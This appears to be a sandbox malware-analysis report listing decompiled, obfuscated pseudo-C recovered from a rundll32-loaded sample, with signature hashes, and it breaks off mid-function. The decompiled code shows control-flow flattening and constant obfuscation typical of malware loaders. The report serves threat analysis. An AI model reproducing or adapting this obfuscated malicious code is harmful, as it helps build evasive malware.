                                                                                                                      0x002c3136
                                                                                                                      0x002c313b
                                                                                                                      0x002c3143
                                                                                                                      0x002c314e
                                                                                                                      0x002c3155
                                                                                                                      0x002c3160
                                                                                                                      0x002c3168
                                                                                                                      0x002c3170
                                                                                                                      0x002c3175
                                                                                                                      0x002c317a
                                                                                                                      0x002c3182
                                                                                                                      0x002c318e
                                                                                                                      0x002c3191
                                                                                                                      0x002c3195
                                                                                                                      0x002c319a
                                                                                                                      0x002c31a2
                                                                                                                      0x002c31aa
                                                                                                                      0x002c31b4
                                                                                                                      0x002c31b8
                                                                                                                      0x002c31c0
                                                                                                                      0x002c31c8
                                                                                                                      0x002c31d0
                                                                                                                      0x002c31d8
                                                                                                                      0x002c31dd
                                                                                                                      0x002c31e2
                                                                                                                      0x002c31ea
                                                                                                                      0x002c31f5
                                                                                                                      0x002c3200
                                                                                                                      0x002c320b
                                                                                                                      0x002c3213
                                                                                                                      0x002c3218
                                                                                                                      0x002c3220
                                                                                                                      0x002c3228
                                                                                                                      0x002c3230
                                                                                                                      0x002c3235
                                                                                                                      0x002c323c
                                                                                                                      0x002c3243
                                                                                                                      0x002c324a
                                                                                                                      0x002c3255
                                                                                                                      0x002c3260
                                                                                                                      0x002c3268
                                                                                                                      0x002c3273
                                                                                                                      0x002c3273
                                                                                                                      0x002c3275
                                                                                                                      0x002c3276
                                                                                                                      0x002c3276
                                                                                                                      0x002c3276
                                                                                                                      0x002c3276
                                                                                                                      0x002c3278
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c33e4
                                                                                                                      0x002c33ea
                                                                                                                      0x002c3454
                                                                                                                      0x002c3458
                                                                                                                      0x002c3464
                                                                                                                      0x002c3469
                                                                                                                      0x002c3477
                                                                                                                      0x002c3492
                                                                                                                      0x002c34b0
                                                                                                                      0x002c34b5
                                                                                                                      0x002c34d1
                                                                                                                      0x002c34ec
                                                                                                                      0x002c34f1
                                                                                                                      0x002c34f4
                                                                                                                      0x002c34f9
                                                                                                                      0x002c3500
                                                                                                                      0x00000000
                                                                                                                      0x002c33ec
                                                                                                                      0x002c33ec
                                                                                                                      0x002c33f2
                                                                                                                      0x002c3431
                                                                                                                      0x002c3437
                                                                                                                      0x002c3442
                                                                                                                      0x002c3442
                                                                                                                      0x002c3445
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c343f
                                                                                                                      0x002c343f
                                                                                                                      0x002c343f
                                                                                                                      0x002c3447
                                                                                                                      0x002c344a
                                                                                                                      0x00000000
                                                                                                                      0x002c33f4
                                                                                                                      0x002c33f4
                                                                                                                      0x002c33fa
                                                                                                                      0x00000000
                                                                                                                      0x002c3400
                                                                                                                      0x002c3417
                                                                                                                      0x002c341c
                                                                                                                      0x002c33fa
                                                                                                                      0x002c33f2
                                                                                                                      0x002c341f
                                                                                                                      0x002c3430
                                                                                                                      0x002c3430
                                                                                                                      0x002c327e
                                                                                                                      0x002c33d2
                                                                                                                      0x002c33d7
                                                                                                                      0x00000000
                                                                                                                      0x002c3284
                                                                                                                      0x002c328a
                                                                                                                      0x002c33b0
                                                                                                                      0x002c33b7
                                                                                                                      0x00000000
                                                                                                                      0x002c3290
                                                                                                                      0x002c3296
                                                                                                                      0x002c3369
                                                                                                                      0x002c338f
                                                                                                                      0x002c3394
                                                                                                                      0x002c3397
                                                                                                                      0x002c3273
                                                                                                                      0x002c3273
                                                                                                                      0x002c3275
                                                                                                                      0x00000000
                                                                                                                      0x002c3275
                                                                                                                      0x002c329c
                                                                                                                      0x002c32a2
                                                                                                                      0x002c3352
                                                                                                                      0x002c3354
                                                                                                                      0x002c3357
                                                                                                                      0x002c3359
                                                                                                                      0x002c335f
                                                                                                                      0x002c3273
                                                                                                                      0x002c3273
                                                                                                                      0x002c3275
                                                                                                                      0x00000000
                                                                                                                      0x002c3275
                                                                                                                      0x002c3273
                                                                                                                      0x002c32a8

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !kX$gB!$i}$mq$S
                                                                                                                      • API String ID: 0-2280178044
                                                                                                                      • Opcode ID: f57ffdb3d82aac97340b132d05cebb02cd4d7b7b62a81bfcf7888fdaf733c8de
                                                                                                                      • Instruction ID: b88637d8cf41a6b58f5179a2108ecf05c283393175e6a051b57767921eea3e76
                                                                                                                      • Opcode Fuzzy Hash: f57ffdb3d82aac97340b132d05cebb02cd4d7b7b62a81bfcf7888fdaf733c8de
                                                                                                                      • Instruction Fuzzy Hash: 222223715193809FD774CF25C88AB8BBBE1FBC5758F108A1DE29A86260D7B18958CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002CB391() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v532;
                                                                                                                      				intOrPtr _v536;
                                                                                                                      				intOrPtr _v540;
                                                                                                                      				intOrPtr _v544;
                                                                                                                      				intOrPtr _v548;
                                                                                                                      				intOrPtr _v552;
                                                                                                                      				intOrPtr _v556;
                                                                                                                      				intOrPtr _v560;
                                                                                                                      				char _v564;
                                                                                                                      				intOrPtr _v568;
                                                                                                                      				char _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _v676;
                                                                                                                      				signed int _v680;
                                                                                                                      				signed int _v684;
                                                                                                                      				signed int _v688;
                                                                                                                      				signed int _v692;
                                                                                                                      				signed int _v696;
                                                                                                                      				signed int _t301;
                                                                                                                      				intOrPtr _t304;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t308;
                                                                                                                      				intOrPtr _t309;
                                                                                                                      				intOrPtr _t311;
                                                                                                                      				void* _t315;
                                                                                                                      				void* _t316;
                                                                                                                      				char _t321;
                                                                                                                      				signed int _t345;
                                                                                                                      				signed int _t346;
                                                                                                                      				signed int _t347;
                                                                                                                      				signed int _t348;
                                                                                                                      				signed int _t349;
                                                                                                                      				void* _t352;
                                                                                                                      
                                                                                                                      				_v688 = 0x901d1c;
                                                                                                                      				_v688 = _v688 >> 1;
                                                                                                                      				_t316 = 0x1066f98;
                                                                                                                      				_v688 = _v688 >> 0xb;
                                                                                                                      				_v688 = _v688 >> 4;
                                                                                                                      				_v688 = _v688 ^ 0x00000091;
                                                                                                                      				_v672 = 0xe40ad3;
                                                                                                                      				_v672 = _v672 + 0xffffd85d;
                                                                                                                      				_v672 = _v672 * 0x13;
                                                                                                                      				_t315 = 0;
                                                                                                                      				_v672 = _v672 + 0xffff2a54;
                                                                                                                      				_v672 = _v672 ^ 0x10e907e4;
                                                                                                                      				_v592 = 0x3017ed;
                                                                                                                      				_t345 = 7;
                                                                                                                      				_v592 = _v592 * 0x4e;
                                                                                                                      				_v592 = _v592 ^ 0x0ea74a35;
                                                                                                                      				_v660 = 0x55ed7f;
                                                                                                                      				_v660 = _v660 << 0xa;
                                                                                                                      				_v660 = _v660 ^ 0xe1a17f4c;
                                                                                                                      				_v660 = _v660 ^ 0xb614834c;
                                                                                                                      				_v608 = 0x9a742a;
                                                                                                                      				_v608 = _v608 / _t345;
                                                                                                                      				_v608 = _v608 ^ 0x00111f40;
                                                                                                                      				_v620 = 0xa60b0f;
                                                                                                                      				_v620 = _v620 | 0xf97ffff7;
                                                                                                                      				_v620 = _v620 ^ 0xf9fd807b;
                                                                                                                      				_v648 = 0xfa23dc;
                                                                                                                      				_v648 = _v648 + 0xc8b0;
                                                                                                                      				_v648 = _v648 ^ 0x1c787af5;
                                                                                                                      				_v648 = _v648 ^ 0x1c8a9b8c;
                                                                                                                      				_v644 = 0x871147;
                                                                                                                      				_v644 = _v644 ^ 0x5acff931;
                                                                                                                      				_t346 = 0x17;
                                                                                                                      				_v644 = _v644 / _t346;
                                                                                                                      				_v644 = _v644 ^ 0x03ea575c;
                                                                                                                      				_v676 = 0x868c3;
                                                                                                                      				_v676 = _v676 | 0x99683da5;
                                                                                                                      				_v676 = _v676 ^ 0x7cfc9963;
                                                                                                                      				_v676 = _v676 * 0x60;
                                                                                                                      				_v676 = _v676 ^ 0x17da9425;
                                                                                                                      				_v692 = 0x1af18a;
                                                                                                                      				_v692 = _v692 >> 5;
                                                                                                                      				_v692 = _v692 >> 9;
                                                                                                                      				_v692 = _v692 | 0x73f4147c;
                                                                                                                      				_v692 = _v692 ^ 0x73f59be7;
                                                                                                                      				_v588 = 0xc5bea0;
                                                                                                                      				_v588 = _v588 >> 1;
                                                                                                                      				_v588 = _v588 ^ 0x00674961;
                                                                                                                      				_v640 = 0x2d0675;
                                                                                                                      				_v640 = _v640 << 0x10;
                                                                                                                      				_v640 = _v640 * 0x13;
                                                                                                                      				_v640 = _v640 ^ 0x7aa9e3bb;
                                                                                                                      				_v684 = 0x479e10;
                                                                                                                      				_v684 = _v684 >> 4;
                                                                                                                      				_v684 = _v684 >> 4;
                                                                                                                      				_v684 = _v684 + 0xffff346b;
                                                                                                                      				_v684 = _v684 ^ 0xfffe4734;
                                                                                                                      				_v632 = 0xc30056;
                                                                                                                      				_v632 = _v632 * 0x5c;
                                                                                                                      				_v632 = _v632 * 0x6f;
                                                                                                                      				_v632 = _v632 ^ 0x62b5b133;
                                                                                                                      				_v652 = 0xa7e056;
                                                                                                                      				_v652 = _v652 + 0xffffad3c;
                                                                                                                      				_v652 = _v652 + 0x159e;
                                                                                                                      				_v652 = _v652 ^ 0x00a9a717;
                                                                                                                      				_v656 = 0x7de4be;
                                                                                                                      				_v656 = _v656 ^ 0xe25ca0e3;
                                                                                                                      				_v656 = _v656 + 0xfffff925;
                                                                                                                      				_v656 = _v656 ^ 0xe22d648b;
                                                                                                                      				_v624 = 0x8a5e75;
                                                                                                                      				_v624 = _v624 << 1;
                                                                                                                      				_v624 = _v624 ^ 0x6ebaa440;
                                                                                                                      				_v624 = _v624 ^ 0x6faa9c0f;
                                                                                                                      				_v612 = 0xc07e93;
                                                                                                                      				_v612 = _v612 >> 0xe;
                                                                                                                      				_v612 = _v612 ^ 0x000a477b;
                                                                                                                      				_v680 = 0x9e34fb;
                                                                                                                      				_v680 = _v680 ^ 0x08ee2ed2;
                                                                                                                      				_v680 = _v680 | 0xddc8b22d;
                                                                                                                      				_v680 = _v680 + 0xffff580d;
                                                                                                                      				_v680 = _v680 ^ 0xddf50a5e;
                                                                                                                      				_v580 = 0xd0aa6a;
                                                                                                                      				_t347 = 0x7f;
                                                                                                                      				_v580 = _v580 / _t347;
                                                                                                                      				_v580 = _v580 ^ 0x000dde97;
                                                                                                                      				_v576 = 0xcc5a;
                                                                                                                      				_v576 = _v576 + 0xffff83d9;
                                                                                                                      				_v576 = _v576 ^ 0x0009e5e2;
                                                                                                                      				_v600 = 0x582413;
                                                                                                                      				_v600 = _v600 << 9;
                                                                                                                      				_v600 = _v600 ^ 0xb0446c4a;
                                                                                                                      				_v628 = 0x333e17;
                                                                                                                      				_v628 = _v628 + 0x2781;
                                                                                                                      				_v628 = _v628 << 2;
                                                                                                                      				_v628 = _v628 ^ 0x00cb68d0;
                                                                                                                      				_v636 = 0xefc605;
                                                                                                                      				_v636 = _v636 + 0xf21d;
                                                                                                                      				_v636 = _v636 ^ 0xa2cf77f2;
                                                                                                                      				_v636 = _v636 ^ 0xa23a4adf;
                                                                                                                      				_v584 = 0xc861d6;
                                                                                                                      				_v584 = _v584 + 0xfffffbc1;
                                                                                                                      				_v584 = _v584 ^ 0x00c0ae4c;
                                                                                                                      				_v696 = 0x7445bb;
                                                                                                                      				_v696 = _v696 >> 4;
                                                                                                                      				_v696 = _v696 >> 4;
                                                                                                                      				_t348 = 0x3d;
                                                                                                                      				_v696 = _v696 / _t348;
                                                                                                                      				_v696 = _v696 ^ 0x0009867a;
                                                                                                                      				_v668 = 0xeed7a6;
                                                                                                                      				_v668 = _v668 + 0xffff818b;
                                                                                                                      				_v668 = _v668 + 0xffff94c8;
                                                                                                                      				_v668 = _v668 | 0xd4d5cc38;
                                                                                                                      				_v668 = _v668 ^ 0xd4f8ebbd;
                                                                                                                      				_v616 = 0xaa402c;
                                                                                                                      				_v616 = _v616 | 0x0a4de871;
                                                                                                                      				_v616 = _v616 ^ 0x0aee0038;
                                                                                                                      				_v596 = 0xe91624;
                                                                                                                      				_v596 = _v596 << 5;
                                                                                                                      				_v596 = _v596 ^ 0x1d2db722;
                                                                                                                      				_v664 = 0xe73f23;
                                                                                                                      				_v664 = _v664 + 0xffff972a;
                                                                                                                      				_v664 = _v664 | 0x942ef86c;
                                                                                                                      				_v664 = _v664 ^ 0xa565e6c8;
                                                                                                                      				_v664 = _v664 ^ 0x31893120;
                                                                                                                      				_v604 = 0xdd76c6;
                                                                                                                      				_t349 = 0x2b;
                                                                                                                      				_t344 = _v616;
                                                                                                                      				_v604 = _v604 / _t349;
                                                                                                                      				_v604 = _v604 ^ 0x0000a605;
                                                                                                                      				do {
                                                                                                                      					while(_t316 != 0xb706b9) {
                                                                                                                      						if(_t316 == 0x1066f98) {
                                                                                                                      							_t316 = 0x2a9290b;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t316 == 0x2a9290b) {
                                                                                                                      								E002CBBB2(_v608, _v620,  &_v572);
                                                                                                                      								_t316 = 0xb706b9;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t316 == 0x5ceff6a) {
                                                                                                                      									_t301 = E002CE938(0, _v672, _v680, _v580, _v592, _t316, _v576, _v600, _t316, _v628, _v688,  &_v524);
                                                                                                                      									_t344 = _t301;
                                                                                                                      									_t352 = _t352 + 0x28;
                                                                                                                      									__eflags = _t301 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t316 = 0xefecb64;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t316 == 0xe98dd96) {
                                                                                                                      										E002C4DAD(_v616, _v596, _t344, _v664, _v604);
                                                                                                                      									} else {
                                                                                                                      										if(_t316 == 0xefecb64) {
                                                                                                                      											_t304 = _v568;
                                                                                                                      											_t321 = _v572;
                                                                                                                      											_v560 = _t304;
                                                                                                                      											_v552 = _t304;
                                                                                                                      											_v544 = _t304;
                                                                                                                      											_v536 = _t304;
                                                                                                                      											_v532 = _v660;
                                                                                                                      											_v564 = _t321;
                                                                                                                      											_v556 = _t321;
                                                                                                                      											_v548 = _t321;
                                                                                                                      											_v540 = _t321;
                                                                                                                      											_t307 = E002B5D65(_t321, _t344, _v636, _t321,  &_v564, _v584, _v696, _v668);
                                                                                                                      											_t352 = _t352 + 0x18;
                                                                                                                      											__eflags = _t307;
                                                                                                                      											_t315 =  !=  ? 1 : _t315;
                                                                                                                      											_t316 = 0xe98dd96;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											_t362 = _t316 - 0xf7fe787;
                                                                                                                      											if(_t316 != 0xf7fe787) {
                                                                                                                      												goto L15;
                                                                                                                      											} else {
                                                                                                                      												_push(_v692);
                                                                                                                      												_push(_v676);
                                                                                                                      												_push(0x2b10cc);
                                                                                                                      												_t308 = E002BAB66(_v648, _v644, _t362);
                                                                                                                      												_t309 =  *0x2d520c; // 0x0
                                                                                                                      												_t311 =  *0x2d520c; // 0x0
                                                                                                                      												E002BE7CE(_t308, _t362, _v588, _t311 + 8, _v648, _v640, _v684, _v632, _v652, _t309 + 0x220);
                                                                                                                      												E002BAE03(_v656, _v624, _v612, _t308);
                                                                                                                      												_t352 = _t352 + 0x34;
                                                                                                                      												_t316 = 0x5ceff6a;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t315;
                                                                                                                      					}
                                                                                                                      					_v572 = _v572 - E002B9A1E();
                                                                                                                      					_t316 = 0xf7fe787;
                                                                                                                      					asm("sbb [esp+0x94], edx");
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t316 - 0x36ffdb;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L18;
                                                                                                                      			}





























































                                                                                                                      0x002cb7e3
                                                                                                                      0x002cb7e3
                                                                                                                      0x002cb7e7
                                                                                                                      0x002cb7f3
                                                                                                                      0x002cb7f8
                                                                                                                      0x002cb802
                                                                                                                      0x002cb81f
                                                                                                                      0x002cb837
                                                                                                                      0x002cb84f
                                                                                                                      0x002cb854
                                                                                                                      0x002cb857
                                                                                                                      0x00000000
                                                                                                                      0x002cb857
                                                                                                                      0x002cb7dd
                                                                                                                      0x002cb7d1
                                                                                                                      0x002cb7c5
                                                                                                                      0x002cb7b9
                                                                                                                      0x002cb7ad
                                                                                                                      0x002cb9a7
                                                                                                                      0x002cb9b0
                                                                                                                      0x002cb9b0
                                                                                                                      0x002cb967
                                                                                                                      0x002cb96e
                                                                                                                      0x002cb973
                                                                                                                      0x002cb97a
                                                                                                                      0x002cb97a
                                                                                                                      0x002cb97a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #?$8$V$aIg$qM
                                                                                                                      • API String ID: 0-1946175224
                                                                                                                      • Opcode ID: 57d27c489026f7624a49baa8de5ff50836fcd821a769eb49c2077c0a4aadb245
                                                                                                                      • Instruction ID: cceebdc97b08e481bc0296a6008507da6921cbb29eab3b82ea84f9991fc99928
                                                                                                                      • Opcode Fuzzy Hash: 57d27c489026f7624a49baa8de5ff50836fcd821a769eb49c2077c0a4aadb245
                                                                                                                      • Instruction Fuzzy Hash: E2E110714083809FD369CF65C48AA5BFBE1FBC4754F108A1DF6AA86260D7B58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002D0867(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr* _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				intOrPtr* _t266;
                                                                                                                      				intOrPtr _t273;
                                                                                                                      				intOrPtr _t274;
                                                                                                                      				intOrPtr _t275;
                                                                                                                      				intOrPtr _t281;
                                                                                                                      				intOrPtr _t282;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				signed int _t307;
                                                                                                                      				signed int _t308;
                                                                                                                      				signed int _t309;
                                                                                                                      				signed int _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				signed int _t312;
                                                                                                                      				signed int _t313;
                                                                                                                      				intOrPtr _t314;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t317;
                                                                                                                      				intOrPtr _t318;
                                                                                                                      				intOrPtr _t319;
                                                                                                                      				signed int* _t320;
                                                                                                                      
                                                                                                                      				_t275 = __ecx;
                                                                                                                      				_t320 =  &_v116;
                                                                                                                      				_v12 = __edx;
                                                                                                                      				_v28 = __ecx;
                                                                                                                      				_v8 = 0x8dec59;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v84 = 0xe165d;
                                                                                                                      				_v84 = _v84 << 7;
                                                                                                                      				_v84 = _v84 + 0xc1b7;
                                                                                                                      				_v84 = _v84 ^ 0xc80f2461;
                                                                                                                      				_v84 = _v84 ^ 0xcf04d456;
                                                                                                                      				_v32 = 0x655f30;
                                                                                                                      				_v32 = _v32 + 0x312d;
                                                                                                                      				_v32 = _v32 ^ 0x0065b82f;
                                                                                                                      				_v56 = 0xcafed0;
                                                                                                                      				_v24 = 0;
                                                                                                                      				_t316 = 0x75256fb;
                                                                                                                      				_t307 = 0x74;
                                                                                                                      				_v56 = _v56 / _t307;
                                                                                                                      				_v56 = _v56 | 0x8b781090;
                                                                                                                      				_v56 = _v56 ^ 0x8b7ff779;
                                                                                                                      				_v96 = 0xabe325;
                                                                                                                      				_v96 = _v96 << 0xd;
                                                                                                                      				_v96 = _v96 ^ 0xcbcb3531;
                                                                                                                      				_v96 = _v96 | 0x09a083b5;
                                                                                                                      				_v96 = _v96 ^ 0xbfa5786a;
                                                                                                                      				_v76 = 0x7b9c0a;
                                                                                                                      				_t308 = 0x1c;
                                                                                                                      				_v76 = _v76 / _t308;
                                                                                                                      				_v76 = _v76 + 0xffff76d9;
                                                                                                                      				_v76 = _v76 ^ 0x00066890;
                                                                                                                      				_v80 = 0xfad268;
                                                                                                                      				_v80 = _v80 << 0x10;
                                                                                                                      				_v80 = _v80 ^ 0x68dc041b;
                                                                                                                      				_v80 = _v80 ^ 0xbab50c4e;
                                                                                                                      				_v112 = 0x5717c0;
                                                                                                                      				_v112 = _v112 + 0xd318;
                                                                                                                      				_v112 = _v112 + 0xffff9813;
                                                                                                                      				_v112 = _v112 ^ 0x80b72014;
                                                                                                                      				_v112 = _v112 ^ 0x80e33bd1;
                                                                                                                      				_v116 = 0x9f285d;
                                                                                                                      				_v116 = _v116 >> 9;
                                                                                                                      				_v116 = _v116 + 0xffff6359;
                                                                                                                      				_v116 = _v116 + 0x4b40;
                                                                                                                      				_v116 = _v116 ^ 0xfffb57cb;
                                                                                                                      				_v104 = 0x80a8a2;
                                                                                                                      				_t309 = 0x29;
                                                                                                                      				_v104 = _v104 * 0x2c;
                                                                                                                      				_v104 = _v104 | 0xf3fc02bd;
                                                                                                                      				_v104 = _v104 * 0x46;
                                                                                                                      				_v104 = _v104 ^ 0xcf237eb9;
                                                                                                                      				_v72 = 0x5bfbbd;
                                                                                                                      				_v72 = _v72 | 0xd3d7b19d;
                                                                                                                      				_v72 = _v72 << 0xe;
                                                                                                                      				_v72 = _v72 ^ 0xfee9d95e;
                                                                                                                      				_v108 = 0xd9b2ce;
                                                                                                                      				_v108 = _v108 << 0xf;
                                                                                                                      				_v108 = _v108 + 0xffff979e;
                                                                                                                      				_v108 = _v108 << 2;
                                                                                                                      				_v108 = _v108 ^ 0x6594627e;
                                                                                                                      				_v40 = 0xeed128;
                                                                                                                      				_v40 = _v40 * 0x34;
                                                                                                                      				_v40 = _v40 ^ 0x3088f647;
                                                                                                                      				_v68 = 0x4ae85e;
                                                                                                                      				_v68 = _v68 / _t309;
                                                                                                                      				_t310 = 0x35;
                                                                                                                      				_t319 = _v12;
                                                                                                                      				_v68 = _v68 * 0x53;
                                                                                                                      				_v68 = _v68 ^ 0x009a12ab;
                                                                                                                      				_v60 = 0xe58ccf;
                                                                                                                      				_v60 = _v60 / _t310;
                                                                                                                      				_v60 = _v60 >> 9;
                                                                                                                      				_v60 = _v60 ^ 0x00082ee6;
                                                                                                                      				_v100 = 0x896781;
                                                                                                                      				_v100 = _v100 ^ 0xb532ffdf;
                                                                                                                      				_t311 = 0x3d;
                                                                                                                      				_v100 = _v100 / _t311;
                                                                                                                      				_v100 = _v100 >> 0x10;
                                                                                                                      				_v100 = _v100 ^ 0x0003daf8;
                                                                                                                      				_v64 = 0xd8c0ce;
                                                                                                                      				_v64 = _v64 + 0xffffaca0;
                                                                                                                      				_v64 = _v64 << 0xc;
                                                                                                                      				_v64 = _v64 ^ 0x86dd78e3;
                                                                                                                      				_v36 = 0xf932ba;
                                                                                                                      				_t312 = 0x7f;
                                                                                                                      				_v36 = _v36 * 0x58;
                                                                                                                      				_v36 = _v36 ^ 0x55a76b7b;
                                                                                                                      				_v88 = 0x9f6659;
                                                                                                                      				_v88 = _v88 / _t312;
                                                                                                                      				_v88 = _v88 | 0x1ff6fbbf;
                                                                                                                      				_v88 = _v88 ^ 0xc9c88694;
                                                                                                                      				_v88 = _v88 ^ 0xd6316d06;
                                                                                                                      				_v48 = 0x252418;
                                                                                                                      				_v48 = _v48 ^ 0x008304c1;
                                                                                                                      				_v48 = _v48 + 0xffff4e21;
                                                                                                                      				_v48 = _v48 ^ 0x00a4a0c7;
                                                                                                                      				_v92 = 0xdb5076;
                                                                                                                      				_v92 = _v92 + 0xffff1b85;
                                                                                                                      				_v92 = _v92 | 0x2d9bcef8;
                                                                                                                      				_t313 = 0x68;
                                                                                                                      				_v92 = _v92 / _t313;
                                                                                                                      				_v92 = _v92 ^ 0x0076c4f2;
                                                                                                                      				_v52 = 0x242151;
                                                                                                                      				_v52 = _v52 | 0x94ee4ace;
                                                                                                                      				_v52 = _v52 + 0xf8ef;
                                                                                                                      				_v52 = _v52 ^ 0x94e81f3d;
                                                                                                                      				_t314 = _v4;
                                                                                                                      				_t274 = _v8;
                                                                                                                      				L1:
                                                                                                                      				while(1) {
                                                                                                                      					do {
                                                                                                                      						while(_t316 != 0x1075595) {
                                                                                                                      							if(_t316 == 0x75256fb) {
                                                                                                                      								_t316 = 0x1075595;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t316 != 0xe0f16ec) {
                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									_t281 = E002B840B(_v76,  &_v20, _v80, _t275, _v112, _t319, _v116, _t261);
                                                                                                                      									_t320 =  &(_t320[6]);
                                                                                                                      									_v24 = _t281;
                                                                                                                      									if(_t281 == 0) {
                                                                                                                      										_t317 = _v24;
                                                                                                                      										L20:
                                                                                                                      										E002B68DE(_v88, _v48, _v92, _v52, _t274);
                                                                                                                      									} else {
                                                                                                                      										_t282 = _v20;
                                                                                                                      										if(_t282 == 0) {
                                                                                                                      											goto L16;
                                                                                                                      										} else {
                                                                                                                      											_v44 = _v44 + _t282;
                                                                                                                      											_t319 = _t319 - _t282;
                                                                                                                      											if(_t319 != 0) {
                                                                                                                      												L9:
                                                                                                                      												_t261 = _v44;
                                                                                                                      												L10:
                                                                                                                      												_t275 = _v28;
                                                                                                                      												_t316 = 0xe0f16ec;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												_t283 = _t314 + _t314;
                                                                                                                      												_push(_t283);
                                                                                                                      												_push(_t283);
                                                                                                                      												_v16 = _t283;
                                                                                                                      												_t318 = E002C3512(_t283);
                                                                                                                      												if(_t318 == 0) {
                                                                                                                      													goto L16;
                                                                                                                      												} else {
                                                                                                                      													E002CFD29(_t274, _v40, _t318, _v68, _t314);
                                                                                                                      													E002B68DE(_v60, _v100, _v64, _v36, _t274);
                                                                                                                      													_t319 = _t314;
                                                                                                                      													_t273 = _t318 + _t314;
                                                                                                                      													_t314 = _v16;
                                                                                                                      													_t320 =  &(_t320[6]);
                                                                                                                      													_v44 = _t273;
                                                                                                                      													_t274 = _t318;
                                                                                                                      													if(_t319 == 0) {
                                                                                                                      														goto L16;
                                                                                                                      													} else {
                                                                                                                      														goto L9;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _t317;
                                                                                                                      						}
                                                                                                                      						_t314 = 0x10000;
                                                                                                                      						_push(_t275);
                                                                                                                      						_push(_t275);
                                                                                                                      						_t261 = E002C3512(0x10000);
                                                                                                                      						_t274 = _t261;
                                                                                                                      						if(_t274 == 0) {
                                                                                                                      							_t275 = _v28;
